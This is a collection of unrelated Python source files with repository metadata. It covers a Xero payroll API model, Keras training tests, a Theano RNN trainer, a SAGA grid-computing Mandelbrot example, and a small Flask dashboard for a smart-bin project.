max_stars: xero_python/payrolluk/models/payment_line.py @ parasharrk/xero-python (e8416f3bd893520a343af014f5bb65acbf1f4f13) | licenses: ["MIT"] | stars: null
max_issues: xero_python/payrolluk/models/payment_line.py @ parasharrk/xero-python (e8416f3bd893520a343af014f5bb65acbf1f4f13) | licenses: ["MIT"] | issues: null
max_forks: xero_python/payrolluk/models/payment_line.py @ parasharrk/xero-python (e8416f3bd893520a343af014f5bb65acbf1f4f13) | licenses: ["MIT"] | forks: null
content:
# coding: utf-8
"""
Xero Payroll UK
This is the Xero Payroll API for orgs in the UK region. # noqa: E501
OpenAPI spec version: 2.4.0
Contact: api@xero.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
from xero_python.models import BaseModel
class PaymentLine(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
"payment_line_id": "str",
"amount": "float",
"account_number": "str",
"sort_code": "str",
"account_name": "str",
}
attribute_map = {
"payment_line_id": "paymentLineID",
"amount": "amount",
"account_number": "accountNumber",
"sort_code": "sortCode",
"account_name": "accountName",
}
def __init__(
self,
payment_line_id=None,
amount=None,
account_number=None,
sort_code=None,
account_name=None,
): # noqa: E501
"""PaymentLine - a model defined in OpenAPI""" # noqa: E501
self._payment_line_id = None
self._amount = None
self._account_number = None
self._sort_code = None
self._account_name = None
self.discriminator = None
if payment_line_id is not None:
self.payment_line_id = payment_line_id
if amount is not None:
self.amount = amount
if account_number is not None:
self.account_number = account_number
if sort_code is not None:
self.sort_code = sort_code
if account_name is not None:
self.account_name = account_name
@property
def payment_line_id(self):
"""Gets the payment_line_id of this PaymentLine. # noqa: E501
Xero identifier for payroll payment line # noqa: E501
:return: The payment_line_id of this PaymentLine. # noqa: E501
:rtype: str
"""
return self._payment_line_id
@payment_line_id.setter
def payment_line_id(self, payment_line_id):
"""Sets the payment_line_id of this PaymentLine.
Xero identifier for payroll payment line # noqa: E501
:param payment_line_id: The payment_line_id of this PaymentLine. # noqa: E501
:type: str
"""
self._payment_line_id = payment_line_id
@property
def amount(self):
"""Gets the amount of this PaymentLine. # noqa: E501
The amount of the payment line # noqa: E501
:return: The amount of this PaymentLine. # noqa: E501
:rtype: float
"""
return self._amount
@amount.setter
def amount(self, amount):
"""Sets the amount of this PaymentLine.
The amount of the payment line # noqa: E501
:param amount: The amount of this PaymentLine. # noqa: E501
:type: float
"""
self._amount = amount
@property
def account_number(self):
"""Gets the account_number of this PaymentLine. # noqa: E501
The account number # noqa: E501
:return: The account_number of this PaymentLine. # noqa: E501
:rtype: str
"""
return self._account_number
@account_number.setter
def account_number(self, account_number):
"""Sets the account_number of this PaymentLine.
The account number # noqa: E501
:param account_number: The account_number of this PaymentLine. # noqa: E501
:type: str
"""
self._account_number = account_number
@property
def sort_code(self):
"""Gets the sort_code of this PaymentLine. # noqa: E501
The account sort code # noqa: E501
:return: The sort_code of this PaymentLine. # noqa: E501
:rtype: str
"""
return self._sort_code
@sort_code.setter
def sort_code(self, sort_code):
"""Sets the sort_code of this PaymentLine.
The account sort code # noqa: E501
:param sort_code: The sort_code of this PaymentLine. # noqa: E501
:type: str
"""
self._sort_code = sort_code
@property
def account_name(self):
"""Gets the account_name of this PaymentLine. # noqa: E501
The account name # noqa: E501
:return: The account_name of this PaymentLine. # noqa: E501
:rtype: str
"""
return self._account_name
@account_name.setter
def account_name(self, account_name):
"""Sets the account_name of this PaymentLine.
The account name # noqa: E501
:param account_name: The account_name of this PaymentLine. # noqa: E501
:type: str
"""
self._account_name = account_name
avg_line_length: 26.544503 | max_line_length: 86 | alphanum_fraction: 0.603748

hexsha: 4a1b32f0931896f64137bc057705a82a7d66afbe | size: 14,395 | ext: py | lang: Python
max_stars: tensorflow/python/keras/engine/training_eager_test.py @ EricRemmerswaal/tensorflow (141ff27877579c81a213fa113bd1b474c1749aca) | licenses: ["Apache-2.0"] | stars: 190,993 | 2015-11-09T13:17:30.000Z to 2022-03-31T23:05:27.000Z
max_issues: tensorflow/python/keras/engine/training_eager_test.py @ EricRemmerswaal/tensorflow (141ff27877579c81a213fa113bd1b474c1749aca) | licenses: ["Apache-2.0"] | issues: 48,461 | 2015-11-09T14:21:11.000Z to 2022-03-31T23:17:33.000Z
max_forks: tensorflow/python/keras/engine/training_eager_test.py @ EricRemmerswaal/tensorflow (141ff27877579c81a213fa113bd1b474c1749aca) | licenses: ["Apache-2.0"] | forks: 104,981 | 2015-11-09T13:40:17.000Z to 2022-03-31T19:51:54.000Z
content:
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training routines."""
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import metrics as metrics_module
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.optimizer_v2 import rmsprop
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
class TrainingTest(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_dynamic_model_has_trainable_weights(self):
if not context.executing_eagerly():
# Only test Eager modes, as Graph mode is not relevant for dynamic models.
return
class DynamicModel(keras.Model):
def __init__(self):
super(DynamicModel, self).__init__(dynamic=True)
self.dense = keras.layers.Dense(
1, kernel_initializer='zeros', bias_initializer='ones')
def call(self, inputs):
return self.dense(inputs)
model = DynamicModel()
model.compile(
'rmsprop', 'mae',
run_eagerly=True)
hist = model.fit(np.zeros((1, 1)), np.zeros((1, 1)))
self.assertEqual(hist.history['loss'][-1], 1)
self.assertEqual(len(model.trainable_weights), 2)
loss = model.train_on_batch(np.zeros((1, 1)), np.zeros((1, 1)))
# The loss must have been updated if the trainable weights are taken into
# account during tracking.
self.assertLess(loss, 1)
@keras_parameterized.run_with_all_model_types(exclude_models='sequential')
@keras_parameterized.run_all_keras_modes
def test_model_methods_with_eager_tensors_multi_io(self):
if not context.executing_eagerly():
# Only test V2 Function and V2 Eager modes, as V1 Graph mode with
# symbolic tensors has different requirements.
return
input_a = keras.layers.Input(shape=(3,), name='input_a')
input_b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(4, name='dense')
dropout = keras.layers.Dropout(0.5, name='dropout')
model = testing_utils.get_multi_io_model(
[input_a, dense], [input_b, dense, dropout])
optimizer = rmsprop.RMSprop(learning_rate=0.001)
loss = 'mse'
loss_weights = [1., 0.5]
metrics = ['mae', metrics_module.CategoricalAccuracy()]
model.compile(
optimizer,
loss,
metrics=metrics,
loss_weights=loss_weights,
run_eagerly=testing_utils.should_run_eagerly(),
sample_weight_mode=None)
input_a = array_ops.zeros(shape=(10, 3))
input_b = array_ops.zeros(shape=(10, 3))
target_a = array_ops.zeros(shape=(10, 4))
target_b = array_ops.zeros(shape=(10, 4))
model.fit(
[input_a, input_b], [target_a, target_b],
epochs=1,
batch_size=5,
verbose=0)
# Test: no shuffle.
model.fit(
[input_a, input_b], [target_a, target_b],
epochs=1,
batch_size=5,
verbose=0,
shuffle=False)
# Test: validation data.
model.fit([input_a, input_b], [target_a, target_b],
epochs=1, batch_size=2, verbose=0,
validation_data=([input_a, input_b], [target_a, target_b]))
model.train_on_batch([input_a, input_b], [target_a, target_b])
model.predict([input_a, input_b], batch_size=5)
model.evaluate([input_a, input_b], [target_a, target_b],
batch_size=2, verbose=0)
model.test_on_batch([input_a, input_b], [target_a, target_b])
# Test: mix np and tensors.
input_b = np.zeros(shape=(10, 3)).astype('float32')
target_b = np.zeros(shape=(10, 4)).astype('float32')
model.fit(
[input_a, input_b], [target_a, target_b],
epochs=1,
batch_size=5,
verbose=0)
model.fit([input_a, input_b], [target_a, target_b],
epochs=1, batch_size=2, verbose=0,
validation_data=([input_a, input_b], [target_a, target_b]))
model.fit(
[input_a, input_b], [target_a, target_b],
epochs=1,
batch_size=5,
verbose=0,
shuffle=False)
model.train_on_batch([input_a, input_b], [target_a, target_b])
model.predict([input_a, input_b], batch_size=5)
model.evaluate([input_a, input_b], [target_a, target_b],
batch_size=2, verbose=0)
model.test_on_batch([input_a, input_b], [target_a, target_b])
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_model_methods_with_eager_tensors_single_io(self):
if not context.executing_eagerly():
# Only test V2 Function and V2 Eager modes, as V1 Graph mode with
# symbolic tensors has different requirements.
return
model = testing_utils.get_small_mlp(10, 4, 3)
optimizer = rmsprop.RMSprop(learning_rate=0.001)
loss = 'mse'
metrics = ['mae', metrics_module.CategoricalAccuracy()]
model.compile(
optimizer,
loss,
metrics=metrics,
run_eagerly=testing_utils.should_run_eagerly())
inputs = array_ops.zeros(shape=(10, 3))
targets = array_ops.zeros(shape=(10, 4))
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=0)
model.fit(inputs, targets, epochs=1, batch_size=3, verbose=0, shuffle=False)
model.fit(inputs, targets, epochs=1, batch_size=4, verbose=0,
validation_data=(inputs, targets))
model.evaluate(inputs, targets, batch_size=2, verbose=0)
model.predict(inputs, batch_size=2)
model.train_on_batch(inputs, targets)
model.test_on_batch(inputs, targets)
@keras_parameterized.run_with_all_model_types
def test_model_fit_and_validation_with_missing_arg_errors(self):
model = testing_utils.get_small_mlp(10, 4, 3)
model.compile(optimizer=rmsprop.RMSprop(learning_rate=0.001),
loss='mse',
run_eagerly=True)
x = array_ops.zeros(shape=(10, 3))
y = array_ops.zeros(shape=(10, 4))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).repeat(10).batch(5)
validation_dataset = dataset_ops.Dataset.from_tensor_slices(
(x, y)).repeat().batch(5) # Infinite dataset.
model.fit(dataset, epochs=1, verbose=0)
# Step argument is required for infinite datasets.
with self.assertRaises(ValueError):
model.fit(dataset, steps_per_epoch=2, epochs=1, verbose=0,
validation_data=validation_dataset)
with self.assertRaises(ValueError):
model.fit(dataset, steps_per_epoch=2, epochs=1, verbose=0,
validation_data=validation_dataset)
# TODO(b/120931266): Enable test on subclassed models after bug causing an
# extra dimension to be added to predict outputs is fixed.
@keras_parameterized.run_with_all_model_types(exclude_models='subclass')
def test_generator_methods(self):
model = testing_utils.get_small_mlp(10, 4, 3)
optimizer = rmsprop.RMSprop(learning_rate=0.001)
model.compile(
optimizer,
loss='mse',
metrics=['mae', metrics_module.CategoricalAccuracy()],
run_eagerly=True)
x = np.random.random((10, 3))
y = np.random.random((10, 4))
def numpy_iterator():
while True:
yield x, y
model.fit_generator(numpy_iterator(), steps_per_epoch=3, epochs=1)
model.evaluate_generator(numpy_iterator(), steps=3)
def inference_numpy_iterator():
while True:
yield x
out = model.predict_generator(inference_numpy_iterator(), steps=3)
self.assertEqual(out.shape, (30, 4))
class CorrectnessTest(keras_parameterized.TestCase):
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
@parameterized.named_parameters([
('', dict()),
('_clipvalue_inf', {'clipvalue': 999999}),
('_clipnorm_inf', {'clipnorm': 999999}),
])
def test_loss_correctness(self, optimizer_kwargs):
# Test that training loss is the same in eager and graph
# (by comparing it to a reference value in a deterministic case)
layers = [
keras.layers.Dense(3, activation='relu',
kernel_initializer='ones'),
keras.layers.Dense(2, activation='softmax', kernel_initializer='ones')]
model = testing_utils.get_model_from_layers(layers, input_shape=(4,))
model.compile(
loss='sparse_categorical_crossentropy',
optimizer=rmsprop.RMSprop(learning_rate=0.001, **optimizer_kwargs),
run_eagerly=testing_utils.should_run_eagerly())
x = np.ones((100, 4))
np.random.seed(123)
y = np.random.randint(0, 1, size=(100, 1))
history = model.fit(x, y, epochs=1, batch_size=10)
self.assertAlmostEqual(history.history['loss'][-1], 0.5836, 4)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_loss_correctness_clipvalue_zero(self):
# Test that training loss is the same in eager and graph
# (by comparing it to a reference value in a deterministic case)
# And confirm that setting clipvalue to zero stops all training
layers = [
keras.layers.Dense(3, activation='relu',
kernel_initializer='ones'),
keras.layers.Dense(2, activation='softmax', kernel_initializer='ones')]
model = testing_utils.get_model_from_layers(layers, input_shape=(4,))
model.compile(
loss='sparse_categorical_crossentropy',
optimizer=rmsprop.RMSprop(learning_rate=0.001, clipvalue=0.0),
run_eagerly=testing_utils.should_run_eagerly())
x = np.ones((100, 4))
np.random.seed(123)
y = np.random.randint(0, 1, size=(100, 1))
history = model.fit(x, y, epochs=3, batch_size=10)
self.assertAlmostEqual(history.history['loss'][-3], 0.6931, 4)
self.assertAlmostEqual(history.history['loss'][-2], 0.6931, 4)
self.assertAlmostEqual(history.history['loss'][-1], 0.6931, 4)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_loss_correctness_with_iterator(self):
# Test that training loss is the same in eager and graph
# (by comparing it to a reference value in a deterministic case)
layers = [
keras.layers.Dense(3, activation='relu',
kernel_initializer='ones'),
keras.layers.Dense(2, activation='softmax', kernel_initializer='ones')]
model = testing_utils.get_model_from_layers(layers, input_shape=(4,))
model.compile(
loss='sparse_categorical_crossentropy',
optimizer=rmsprop.RMSprop(learning_rate=0.001),
run_eagerly=testing_utils.should_run_eagerly())
x = np.ones((100, 4), dtype=np.float32)
np.random.seed(123)
y = np.random.randint(0, 1, size=(100, 1))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y))
dataset = dataset.repeat(100)
dataset = dataset.batch(10)
history = model.fit(dataset, epochs=1, steps_per_epoch=10)
self.assertAlmostEqual(history.history['loss'][-1], 0.5836, 4)
@parameterized.named_parameters([
('_None', None, 0., 4.),
('_False', False, 4., 4.),
('_True', True, 0., 0.),
])
def test_nested_model_learning_phase(self, training,
expected_training_loss,
expected_validation_loss):
"""Tests that learning phase is correctly set in an intermediate layer."""
def _make_unregularized_model():
inputs = keras.Input((4,))
# Zero out activations when `training=True`.
x = keras.layers.Dropout(1. - 1. / (1 << 24))(inputs)
x = keras.layers.Dense(
10,
activation='relu',
trainable=False,
bias_initializer='zeros',
kernel_initializer='ones')(
x) # Just sum together all the activations.
outputs = keras.layers.Dense(3)(x)
return keras.Model(inputs, outputs)
def _regularize_model(unregularized_model):
# Regularize the most recent activations of a post-dropout layer.
sample_activations = unregularized_model.get_layer(
index=-2).get_output_at(-1)
regularization_loss = keras.backend.mean(sample_activations)
unregularized_model.add_loss(regularization_loss)
unregularized_model.add_metric(
regularization_loss, aggregation='mean', name='regularization_loss')
inputs = keras.Input(unregularized_model.inputs[0].shape[1:])
logits = unregularized_model(inputs, training=training)
outputs = keras.activations.softmax(logits)
model = keras.Model(inputs, outputs)
return model
# Make and compile models.
model = _regularize_model(_make_unregularized_model())
model.compile('sgd', 'sparse_categorical_crossentropy')
# Prepare fake data.
x = np.ones((20, 4)).astype(np.float32)
y = np.random.randint(0, 3, size=(20,)).astype(np.int64)
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(2)
results = model.evaluate(dataset)
evaluation_results = dict(zip(model.metrics_names, results))
# Rate of dropout depends on the learning phase.
self.assertEqual(evaluation_results['regularization_loss'],
expected_validation_loss)
history = model.fit(dataset, epochs=2, validation_data=dataset).history
self.assertAllEqual(history['regularization_loss'],
[expected_training_loss] * 2)
self.assertAllEqual(history['val_regularization_loss'],
[expected_validation_loss] * 2)
if __name__ == '__main__':
ops.enable_eager_execution()
test.main()
avg_line_length: 40.209497 | max_line_length: 80 | alphanum_fraction: 0.680861

hexsha: 4a1b332d1428bccf5fecf87d652dc2f443427f18 | size: 3,965 | ext: py | lang: Python
max_stars: train-theano.py @ tim-pl-m/rnn-tutorial-rnnlm (6af6c8fe6a44c91a2eb73573b3f0a042b29614a6) | licenses: ["Apache-2.0"] | stars: 32 | 2017-10-30T01:44:56.000Z to 2021-12-23T06:40:47.000Z
max_issues: train-theano.py @ tim-pl-m/rnn-tutorial-rnnlm (6af6c8fe6a44c91a2eb73573b3f0a042b29614a6) | licenses: ["Apache-2.0"] | issues: 1 | 2020-11-18T21:13:24.000Z to 2020-11-18T21:13:24.000Z
max_forks: train-theano.py @ tim-pl-m/rnn-tutorial-rnnlm (6af6c8fe6a44c91a2eb73573b3f0a042b29614a6) | licenses: ["Apache-2.0"] | forks: 19 | 2017-12-15T13:27:36.000Z to 2020-08-18T00:16:38.000Z
content:
#! /usr/bin/env python
import csv
import itertools
import operator
import numpy as np
import nltk
import sys
import os
import time
from datetime import datetime
from utils import *
from rnn_theano import RNNTheano
nltk.download("book")
_VOCABULARY_SIZE = int(os.environ.get('VOCABULARY_SIZE', '8000'))
_HIDDEN_DIM = int(os.environ.get('HIDDEN_DIM', '80'))
_LEARNING_RATE = float(os.environ.get('LEARNING_RATE', '0.005'))
_NEPOCH = int(os.environ.get('NEPOCH', '100'))
_MODEL_FILE = os.environ.get('MODEL_FILE')
def train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=1, evaluate_loss_after=5):
# We keep track of the losses so we can plot them later
losses = []
num_examples_seen = 0
for epoch in range(nepoch):
# Optionally evaluate the loss
if (epoch % evaluate_loss_after == 0):
loss = model.calculate_loss(X_train, y_train)
losses.append((num_examples_seen, loss))
time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
print "%s: Loss after num_examples_seen=%d epoch=%d: %f" % (time, num_examples_seen, epoch, loss)
# Adjust the learning rate if loss increases
if (len(losses) > 1 and losses[-1][1] > losses[-2][1]):
learning_rate = learning_rate * 0.5
print "Setting learning rate to %f" % learning_rate
sys.stdout.flush()
# ADDED! Saving model parameters
save_model_parameters_theano("./data/rnn-theano-%d-%d-%s.npz" % (model.hidden_dim, model.word_dim, time), model)
# For each training example...
for i in range(len(y_train)):
# One SGD step
model.sgd_step(X_train[i], y_train[i], learning_rate)
num_examples_seen += 1
vocabulary_size = _VOCABULARY_SIZE
unknown_token = "UNKNOWN_TOKEN"
sentence_start_token = "SENTENCE_START"
sentence_end_token = "SENTENCE_END"
# Read the data and append SENTENCE_START and SENTENCE_END tokens
print "Reading CSV file..."
with open('data/reddit-comments-2015-08.csv', 'rb') as f:
reader = csv.reader(f, skipinitialspace=True)
reader.next()
# Split full comments into sentences
sentences = itertools.chain(*[nltk.sent_tokenize(x[0].decode('utf-8').lower()) for x in reader])
# Append SENTENCE_START and SENTENCE_END
sentences = ["%s %s %s" % (sentence_start_token, x, sentence_end_token) for x in sentences]
print "Parsed %d sentences." % (len(sentences))
# Tokenize the sentences into words
tokenized_sentences = [nltk.word_tokenize(sent) for sent in sentences]
# Count the word frequencies
word_freq = nltk.FreqDist(itertools.chain(*tokenized_sentences))
print "Found %d unique words tokens." % len(word_freq.items())
# Get the most common words and build index_to_word and word_to_index vectors
vocab = word_freq.most_common(vocabulary_size-1)
index_to_word = [x[0] for x in vocab]
index_to_word.append(unknown_token)
word_to_index = dict([(w,i) for i,w in enumerate(index_to_word)])
print "Using vocabulary size %d." % vocabulary_size
print "The least frequent word in our vocabulary is '%s' and appeared %d times." % (vocab[-1][0], vocab[-1][1])
# Replace all words not in our vocabulary with the unknown token
for i, sent in enumerate(tokenized_sentences):
tokenized_sentences[i] = [w if w in word_to_index else unknown_token for w in sent]
# Create the training data
X_train = np.asarray([[word_to_index[w] for w in sent[:-1]] for sent in tokenized_sentences])
y_train = np.asarray([[word_to_index[w] for w in sent[1:]] for sent in tokenized_sentences])
model = RNNTheano(vocabulary_size, hidden_dim=_HIDDEN_DIM)
t1 = time.time()
model.sgd_step(X_train[10], y_train[10], _LEARNING_RATE)
t2 = time.time()
print "SGD Step time: %f milliseconds" % ((t2 - t1) * 1000.)
if _MODEL_FILE != None:
load_model_parameters_theano(_MODEL_FILE, model)
train_with_sgd(model, X_train, y_train, nepoch=_NEPOCH, learning_rate=_LEARNING_RATE)
avg_line_length: 40.459184 | max_line_length: 124 | alphanum_fraction: 0.706431

hexsha: 4a1b333e9ba5e6032c1f6e0ed1d6d3f11b07de48 | size: 3,953 | ext: py | lang: Python
max_stars: examples/tutorial/mandelbrot/saga_mandelbrot_osg.py @ yutiansut/radical.saga (6b80c39223a04a4b240942dc1bd7834c9caffecd) | licenses: ["MIT"] | stars: null
max_issues: examples/tutorial/mandelbrot/saga_mandelbrot_osg.py @ yutiansut/radical.saga (6b80c39223a04a4b240942dc1bd7834c9caffecd) | licenses: ["MIT"] | issues: null
max_forks: examples/tutorial/mandelbrot/saga_mandelbrot_osg.py @ yutiansut/radical.saga (6b80c39223a04a4b240942dc1bd7834c9caffecd) | licenses: ["MIT"] | forks: null
content:
__author__ = "Ole Weidner"
__copyright__ = "Copyright 2012-2013, The SAGA Project"
__license__ = "MIT"
import sys
import time
from PIL import Image
import radical.saga as rs
REMOTE_JOB_ENDPOINT = "condor://localhost"
# the dimension (in pixel) of the whole fractal
IMGX = 2048
IMGY = 2048
# the number of tiles in X and Y direction
TILESX = 2
TILESY = 2
if __name__ == "__main__":
try:
# list that holds the jobs
jobs = []
jobservice = rs.job.Service(REMOTE_JOB_ENDPOINT)
for x in range(0, TILESX):
for y in range(0, TILESY):
# describe a single Mandelbrot job. we're using the
# directory created above as the job's working directory
outputfile = 'tile_x%s_y%s.gif' % (x, y)
jd = rs.job.Description()
# candidate hosts can be changed / and or commented out
# the list below seems to be a good working set for OSG
#jd.candidate_hosts = ["FNAL_FERMIGRID", "cinvestav", "SPRACE",
# "NYSGRID_CORNELL_NYS1", "Purdue-Steele",
# "MIT_CMS_CE2", "SWT2_CPB", "AGLT2_CE_2",
# "UTA_SWT2", "GridUNESP_CENTRAL",
# "USCMS-FNAL-WC1-CE3"]
# on OSG we need to stage in the data with the jobs. we
# can't use the saga filesystem API to copy data around since
# the execution location of the jobs is not known a priori
jd.file_transfer = ["mandelbrot.sh > mandelbrot.sh",
"mandelbrot.py > mandelbrot.py",
"%s < %s" % (outputfile, outputfile)]
jd.wall_time_limit = 10
jd.total_cpu_count = 1
jd.executable = '/bin/sh'
jd.arguments = ['mandelbrot.sh', IMGX, IMGY,
(IMGX/TILESX*x), (IMGX/TILESX*(x+1)),
(IMGY/TILESY*y), (IMGY/TILESY*(y+1)),
outputfile]
# create the job from the description
# above, launch it and add it to the list of jobs
job = jobservice.create_job(jd)
job.run()
jobs.append(job)
print ' * Submitted %s. Output will be written to: %s' % (job.id, outputfile)
# wait for all jobs to finish
while len(jobs) > 0:
for job in jobs:
jobstate = job.get_state()
print ' * Job %s status: %s' % (job.id, jobstate)
if jobstate in [rs.job.DONE, rs.job.FAILED]:
jobs.remove(job)
time.sleep(5)
# stitch together the final image
fullimage = Image.new('RGB', (IMGX, IMGY), (255, 255, 255))
print ' * Stitching together the whole fractal: mandelbrot_full.gif'
for x in range(0, TILESX):
for y in range(0, TILESY):
partimage = Image.open('tile_x%s_y%s.gif' % (x, y))
fullimage.paste(partimage,
(IMGX/TILESX*x, IMGY/TILESY*y,
IMGX/TILESX*(x+1), IMGY/TILESY*(y+1)))
fullimage.save("mandelbrot_full.gif", "GIF")
sys.exit(0)
except rs.SagaException, ex:
# Catch all saga exceptions
print "An exception occured: (%s) %s " % (ex.type, (str(ex)))
# Trace back the exception. That can be helpful for debugging.
print " \n*** Backtrace:\n %s" % ex.traceback
sys.exit(-1)
except KeyboardInterrupt:
# ctrl-c caught: try to cancel our jobs before we exit
# the program, otherwise we'll end up with lingering jobs.
for job in jobs:
job.cancel()
sys.exit(-1)
avg_line_length: 39.53 | max_line_length: 93 | alphanum_fraction: 0.512522

hexsha: 4a1b337e5ec72b38663df852fe545150a1a43392 | size: 83 | ext: py | lang: Python
max_stars: tonks/vision/models/__init__.py @ vanderveld/tonks (e87afbd9614b276b443b4a7527fd1fda01a8be4c) | licenses: ["BSD-3-Clause"] | stars: null
max_issues: tonks/vision/models/__init__.py @ vanderveld/tonks (e87afbd9614b276b443b4a7527fd1fda01a8be4c) | licenses: ["BSD-3-Clause"] | issues: null
max_forks: tonks/vision/models/__init__.py @ vanderveld/tonks (e87afbd9614b276b443b4a7527fd1fda01a8be4c) | licenses: ["BSD-3-Clause"] | forks: null
content:
from tonks.vision.models.multi_task_resnet import ResnetForMultiTaskClassification
avg_line_length: 41.5 | max_line_length: 82 | alphanum_fraction: 0.915663

hexsha: 4a1b3458add597300d1c6d4a95125d3cfe559539 | size: 835 | ext: py | lang: Python
max_stars: parts/cluster_key_long/cluster_key_long.py @ rutgervana/lalboard (4e3174a545aaef074abca677f9573e4fc0cdbc51) | licenses: ["Apache-2.0"] | stars: 622 | 2019-02-14T23:56:28.000Z to 2022-03-29T18:50:25.000Z
max_issues: parts/cluster_key_long/cluster_key_long.py @ rutgervana/lalboard (4e3174a545aaef074abca677f9573e4fc0cdbc51) | licenses: ["Apache-2.0"] | issues: 13 | 2019-07-31T17:20:41.000Z to 2022-01-19T12:55:25.000Z
max_forks: parts/cluster_key_long/cluster_key_long.py @ rutgervana/lalboard (4e3174a545aaef074abca677f9573e4fc0cdbc51) | licenses: ["Apache-2.0"] | forks: 41 | 2019-04-23T13:05:47.000Z to 2022-01-28T15:03:10.000Z
content:
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import adsk.core
from fscad import *
relative_import("../../lalboard.py")
from lalboard import long_side_key
def design():
long_side_key().create_occurrence(scale=.1)
def run(_):
run_design(design, message_box_on_error=False, document_name=__name__)
avg_line_length: 29.821429 | max_line_length: 74 | alphanum_fraction: 0.764072

hexsha: 4a1b351ca6fd08f5b774d0edd4d6b8c9f8fdca47 | size: 3,294 | ext: py | lang: Python
max_stars: Main/route.py @ SmartBinTUC2016/SmartBin-TUC2016 (2ed093dbe29b4aa0ba7b46fa1d945acc9aa476c1) | licenses: ["PSF-2.0", "BSD-3-Clause", "MIT"] | stars: null
max_issues: Main/route.py @ SmartBinTUC2016/SmartBin-TUC2016 (2ed093dbe29b4aa0ba7b46fa1d945acc9aa476c1) | licenses: ["PSF-2.0", "BSD-3-Clause", "MIT"] | issues: null
max_forks: Main/route.py @ SmartBinTUC2016/SmartBin-TUC2016 (2ed093dbe29b4aa0ba7b46fa1d945acc9aa476c1) | licenses: ["PSF-2.0", "BSD-3-Clause", "MIT"] | forks: null
content:
#########################################################################
# The MIT License (MIT) #
# Copyright (c) 2016 Patrick Lai, Josh Manogaran, #
# Brendan Srinivasalu, Elias Tadros #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be #
# included in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, #
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF #
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.#
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY #
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF #
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION #
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #
#########################################################################
# Library from Armin Ronacher
from flask import *
# Own modules
import database
import comms
import random
# Standard Libraries from Python Software Foundation
import json
import urllib2
# Initialise Flask App
app = Flask(__name__)
app.secret_key = 'hello'
# Declare global variables
page = {}
session = {}
'''
Index Page
'''
@app.route('/')
def index():
page['title'] = 'Overview'
page['bins'] = '1'
num_users = database.get_num_users()
return render_template('index.html', page = page, num_users = num_users)
'''
Capacity Page
'''
@app.route('/capacity', methods=['GET','POST'])
def get_capacity():
res = comms.get_data() # Retrieve data
page['title'] = 'Capacity'
# Data assignment to page variables
if res['level'] != '?': # Check whether there was data received
page['capacity'] = (res['weight']/1000 + res['level'])/2 # Calculate total current capacity
else:
page['capacity'] = '?'
page['level'] = res['level']
page['user'] = res['user']
page['weight'] = res['weight']
# Capacity Checking
if page['capacity'] == '?':
page['status'] = 'Connection error'
elif page['capacity'] < 90:
page['status'] = 'OK'
elif page['capacity'] >= 90:
page['status'] = 'FULL'
return render_template('capacity.html', page = page)
'''
Users Page
'''
@app.route('/users')
def get_users():
page['title'] = 'Users'
users = database.get_users()
return render_template('users.html', page = page, users = users)
| 37.431818 | 99 | 0.565574 |
